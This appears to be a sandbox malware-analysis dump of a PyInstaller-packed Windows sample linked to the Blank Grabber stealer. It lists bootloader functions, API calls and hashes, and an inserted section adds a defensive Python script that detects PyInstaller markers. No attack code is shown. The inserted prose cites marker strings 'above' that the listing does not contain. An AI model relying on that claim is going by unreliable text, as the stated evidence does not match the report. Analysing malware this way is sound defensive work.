• Function at 7ff7ead01210 (rendered graph not preserved; the basic-block edge list is omitted). Subcalls in the graph: 7ff7ead0bd80, 7ff7ead02710, 7ff7ead14f44, 7ff7ead14f08, 7ff7ead02910, 7ff7ead0ba60, 7ff7ead14f30, 7ff7ead1039c, 7ff7ead10110, 7ff7ead0a1c0, 7ff7ead10adc, 7ff7ead29e30.
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
• Instruction ID: 62705e2bbc6e83401a42566eb4fc28e506f6df863e2286ddd92be26972ff1290
• Opcode Fuzzy Hash: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
• Instruction Fuzzy Hash: AB51D362A0864285F620FB21A4903BAA392FF84798FC44176EE4D477DDEE3CE541C722

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF7EAD1F0AA,?,?,-00000018,00007FF7EAD1AD53,?,?,?,00007FF7EAD1AC4A,?,?,?,00007FF7EAD15F3E), ref: 00007FF7EAD1EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF7EAD1F0AA,?,?,-00000018,00007FF7EAD1AD53,?,?,?,00007FF7EAD1AC4A,?,?,?,00007FF7EAD15F3E), ref: 00007FF7EAD1EE98
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
• Instruction ID: b39e7234e96bca1a87d7e83c421984d7c3d88e8cf35b04d14a611052094d365f
• Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
• Instruction Fuzzy Hash: 1941F265B19A1241FB16EB269800B75A399FF59B90FC8857ADD1D8738CEE3CE4058222

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7EAD03804), ref: 00007FF7EAD036E1
• GetLastError.KERNEL32(?,00007FF7EAD03804), ref: 00007FF7EAD036EB
  • Part of subcall function 00007FF7EAD02C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02C9E
  • Part of subcall function 00007FF7EAD02C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02D63
  • Part of subcall function 00007FF7EAD02C50: MessageBoxW.USER32 ref: 00007FF7EAD02D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: aa58795fd151d1a2addeb85b119a2229fb7102c7a0d362bdb799c6b4eaf65dcc
• Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction Fuzzy Hash: 48217F61B1864241FA20F724E8953FAA756FF88358FC042B3E65D825DDEE3CE505C762
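
The String IDs of the three loader functions above (LOADER: failed to set the TMP environment variable. and _MEI%d; Failed to extract %s: inflateInit() failed with return code %d!; Failed to obtain executable path.) are the PyInstaller bootloader's own error messages, typo included, so the sample is a PyInstaller-packaged executable whose Python payload is unpacked at run time into a _MEI<pid> directory under the temp path when it was built in one-file mode. The following is an added triage example, not code from this report, from Joe Sandbox or from the sample: it scans a file image for those markers and computes the extraction directory. The function names (find_bootloader_markers, looks_like_pyinstaller, mei_temp_dir), the min_markers threshold and the SAMPLE/NEGATIVE byte blobs are constructed for the example.

```python
"""Added triage example (not code from the report or from the sample): detect
the PyInstaller bootloader by the string markers the report lists above, and
compute the one-file extraction directory."""
from __future__ import annotations

import re

# Markers taken from the String IDs of the functions above. "teporary" is the
# bootloader's own typo and makes an unusually specific exact-match anchor.
BOOTLOADER_MARKERS: dict[str, bytes] = {
    "tmp_env": b"LOADER: failed to set the TMP environment variable.",
    "tmp_len": b"LOADER: length of teporary directory path exceeds maximum path length!",
    "mei_dir": b"_MEI%d",
    "inflate": b"Failed to extract %s: inflateInit() failed with return code %d!",
    "exe_path": b"Failed to obtain executable path.",
}


def _encodings(marker: bytes) -> list[bytes]:
    """Narrow form plus UTF-16LE, so a wide copy of a message is not missed."""
    return [marker, marker.decode("ascii").encode("utf-16-le")]


def find_bootloader_markers(data: bytes) -> dict[str, list[int]]:
    """Return {marker_name: [byte offsets]} for every marker present in data."""
    hits: dict[str, list[int]] = {}
    for name, marker in BOOTLOADER_MARKERS.items():
        offsets = [
            m.start()
            for enc in _encodings(marker)
            for m in re.finditer(re.escape(enc), data)
        ]
        if offsets:
            hits[name] = sorted(offsets)
    return hits


def looks_like_pyinstaller(data: bytes, min_markers: int = 2) -> bool:
    """Verdict requires min_markers distinct markers (threshold is an assumed
    default): a lone "_MEI%d" is too short to carry a decision on its own."""
    return len(find_bootloader_markers(data)) >= min_markers


def mei_temp_dir(tmp_path: str, pid: int) -> str:
    """One-file bootloader unpack location: <temp path>\\_MEI<pid>, the place
    to pull the extracted Python payload from during live analysis.
    tmp_path is whatever the loader resolved; it is passed in here rather
    than looked up."""
    return tmp_path.rstrip("\\/") + "\\_MEI" + str(pid)


# Constructed test input: two markers embedded in filler bytes, and a blob
# with no markers at all.
SAMPLE = (
    b"\x00" * 16
    + BOOTLOADER_MARKERS["mei_dir"]
    + b"\x00" * 8
    + BOOTLOADER_MARKERS["inflate"]
    + b"\xff" * 4
)
NEGATIVE = b"MZ\x90\x00" + b"\x00" * 64

if __name__ == "__main__":
    print(find_bootloader_markers(SAMPLE))
    print(looks_like_pyinstaller(SAMPLE), looks_like_pyinstaller(NEGATIVE))
    print(mei_temp_dir(r"C:\Users\victim\AppData\Local\Temp", 4242))
```

A hit only says the sample is PyInstaller-packaged; it says nothing about what the embedded Python code does. The stealer logic behind the report's Blank Grabber signatures lives in that payload, which is what to recover from the _MEI<pid> directory of the running process (or with a PyInstaller archive extractor against the file) rather than from the bootloader functions listed here.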

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 746 7ff7ead1ba5c-7ff7ead1ba82 747 7ff7ead1ba9d-7ff7ead1baa1 746->747 748 7ff7ead1ba84-7ff7ead1ba98 call 7ff7ead14ee8 call 7ff7ead14f08 746->748 750 7ff7ead1be77-7ff7ead1be83 call 7ff7ead14ee8 call 7ff7ead14f08 747->750 751 7ff7ead1baa7-7ff7ead1baae 747->751 766 7ff7ead1be8e 748->766 768 7ff7ead1be89 call 7ff7ead1a8e0 750->768 751->750 753 7ff7ead1bab4-7ff7ead1bae2 751->753 753->750 756 7ff7ead1bae8-7ff7ead1baef 753->756 760 7ff7ead1bb08-7ff7ead1bb0b 756->760 761 7ff7ead1baf1-7ff7ead1bb03 call 7ff7ead14ee8 call 7ff7ead14f08 756->761 764 7ff7ead1bb11-7ff7ead1bb17 760->764 765 7ff7ead1be73-7ff7ead1be75 760->765 761->768 764->765 770 7ff7ead1bb1d-7ff7ead1bb20 764->770 769 7ff7ead1be91-7ff7ead1bea8 765->769 766->769 768->766 770->761 773 7ff7ead1bb22-7ff7ead1bb47 770->773 775 7ff7ead1bb7a-7ff7ead1bb81 773->775 776 7ff7ead1bb49-7ff7ead1bb4b 773->776 777 7ff7ead1bb83-7ff7ead1bbab call 7ff7ead1d5fc call 7ff7ead1a948 * 2 775->777 778 7ff7ead1bb56-7ff7ead1bb6d call 7ff7ead14ee8 call 7ff7ead14f08 call 7ff7ead1a8e0 775->778 779 7ff7ead1bb4d-7ff7ead1bb54 776->779 780 7ff7ead1bb72-7ff7ead1bb78 776->780 809 7ff7ead1bbc8-7ff7ead1bbf3 call 7ff7ead1c284 777->809 810 7ff7ead1bbad-7ff7ead1bbc3 call 7ff7ead14f08 call 7ff7ead14ee8 777->810 807 7ff7ead1bd00 778->807 779->778 779->780 781 7ff7ead1bbf8-7ff7ead1bc0f 780->781 784 7ff7ead1bc8a-7ff7ead1bc94 call 7ff7ead2391c 781->784 785 7ff7ead1bc11-7ff7ead1bc19 781->785 798 7ff7ead1bc9a-7ff7ead1bcaf 784->798 799 7ff7ead1bd1e 784->799 785->784 788 7ff7ead1bc1b-7ff7ead1bc1d 785->788 788->784 792 7ff7ead1bc1f-7ff7ead1bc35 788->792 792->784 796 7ff7ead1bc37-7ff7ead1bc43 792->796 796->784 803 7ff7ead1bc45-7ff7ead1bc47 796->803 798->799 801 7ff7ead1bcb1-7ff7ead1bcc3 GetConsoleMode 798->801 805 
7ff7ead1bd23-7ff7ead1bd43 ReadFile 799->805 801->799 806 7ff7ead1bcc5-7ff7ead1bccd 801->806 803->784 808 7ff7ead1bc49-7ff7ead1bc61 803->808 811 7ff7ead1bd49-7ff7ead1bd51 805->811 812 7ff7ead1be3d-7ff7ead1be46 GetLastError 805->812 806->805 814 7ff7ead1bccf-7ff7ead1bcf1 ReadConsoleW 806->814 817 7ff7ead1bd03-7ff7ead1bd0d call 7ff7ead1a948 807->817 808->784 818 7ff7ead1bc63-7ff7ead1bc6f 808->818 809->781 810->807 811->812 820 7ff7ead1bd57 811->820 815 7ff7ead1be48-7ff7ead1be5e call 7ff7ead14f08 call 7ff7ead14ee8 812->815 816 7ff7ead1be63-7ff7ead1be66 812->816 822 7ff7ead1bd12-7ff7ead1bd1c 814->822 823 7ff7ead1bcf3 GetLastError 814->823 815->807 827 7ff7ead1bcf9-7ff7ead1bcfb call 7ff7ead14e7c 816->827 828 7ff7ead1be6c-7ff7ead1be6e 816->828 817->769 818->784 826 7ff7ead1bc71-7ff7ead1bc73 818->826 830 7ff7ead1bd5e-7ff7ead1bd73 820->830 822->830 823->827 826->784 835 7ff7ead1bc75-7ff7ead1bc85 826->835 827->807 828->817 830->817 831 7ff7ead1bd75-7ff7ead1bd80 830->831 837 7ff7ead1bda7-7ff7ead1bdaf 831->837 838 7ff7ead1bd82-7ff7ead1bd9b call 7ff7ead1b674 831->838 835->784 842 7ff7ead1be2b-7ff7ead1be38 call 7ff7ead1b4b4 837->842 843 7ff7ead1bdb1-7ff7ead1bdc3 837->843 846 7ff7ead1bda0-7ff7ead1bda2 838->846 842->846 847 7ff7ead1be1e-7ff7ead1be26 843->847 848 7ff7ead1bdc5 843->848 846->817 847->817 850 7ff7ead1bdca-7ff7ead1bdd1 848->850 851 7ff7ead1be0d-7ff7ead1be18 850->851 852 7ff7ead1bdd3-7ff7ead1bdd7 850->852 851->847 853 7ff7ead1bdd9-7ff7ead1bde0 852->853 854 7ff7ead1bdf3 852->854 853->854 855 7ff7ead1bde2-7ff7ead1bde6 853->855 856 7ff7ead1bdf9-7ff7ead1be09 854->856 855->854 857 7ff7ead1bde8-7ff7ead1bdf1 855->857 856->850 858 7ff7ead1be0b 856->858 857->856 858->847
APIs
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0

Control-flow Graph

APIs
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0

Control-flow Graph

APIs
  • Part of subcall function 00007FF7EAD08570: GetCurrentProcess.KERNEL32 ref: 00007FF7EAD08590
  • Part of subcall function 00007FF7EAD08570: OpenProcessToken.ADVAPI32 ref: 00007FF7EAD085A3
  • Part of subcall function 00007FF7EAD08570: GetTokenInformation.KERNELBASE ref: 00007FF7EAD085C8
  • Part of subcall function 00007FF7EAD08570: GetLastError.KERNEL32 ref: 00007FF7EAD085D2
  • Part of subcall function 00007FF7EAD08570: GetTokenInformation.KERNELBASE ref: 00007FF7EAD08612
  • Part of subcall function 00007FF7EAD08570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7EAD0862E
  • Part of subcall function 00007FF7EAD08570: CloseHandle.KERNEL32 ref: 00007FF7EAD08646
• LocalFree.KERNEL32(?,00007FF7EAD03C55), ref: 00007FF7EAD0916C
• LocalFree.KERNEL32(?,00007FF7EAD03C55), ref: 00007FF7EAD09175
Strings
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262

Control-flow Graph

APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EAD1CF4B), ref: 00007FF7EAD1D07C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EAD1CF4B), ref: 00007FF7EAD1D107
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
APIs
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction ID: ecca85b24874862a24e7183fb72d5a99607acda9a7379090796502f01be66a86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6313520E0810645FA14FB6594913B9AB82EF9178CFC444B7E94E4B2DFDE7CA805C273
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                              • Instruction ID: 953e1ae474dd10bd08b1e3f9289dba08291ef248b42607fb00a3a233c1deb3fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40D09E20B0870642FB14BB705C552789359EF58B01F9414BAD80B0639BDD7CB94D8332
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                              • Instruction ID: eec38f99bcf9f54e7f1c3a716ea1f693e33258882375edd9fc26d3db17decd87
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28510561B0924986F728FA7594007BAE381FF64BA4F8A4772DD6C437DDCE3CE5418622
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction ID: 4c2bb2ce44d08f4f13883e68719424bf672e55fff0495f92f2f6dc96292bc4b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1511EF62A08A9281EA20EB25B800269A761EB51FF0F944372EE7D0B7ECCE7CD4508711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                              • Instruction ID: 6ddf93305fa28341ec03096d9e730c5371780db105ea9a17e890f3bf8ebbbb0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCE086A0F0920243FF15FBF154553789351EF94700FC440B2D81D462A9EE3C68818732
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF7EAD1A9D5,?,?,00000000,00007FF7EAD1AA8A), ref: 00007FF7EAD1ABC6
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD1A9D5,?,?,00000000,00007FF7EAD1AA8A), ref: 00007FF7EAD1ABD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction ID: d78c9e0a33182bb1b0867914edefaabed07851869f2b579fb04d35b1bfafe9fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5021C661B0C68241FA90F7B195943BD9382DFA4790FC842FBD92E477E9CE7CA4418322
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
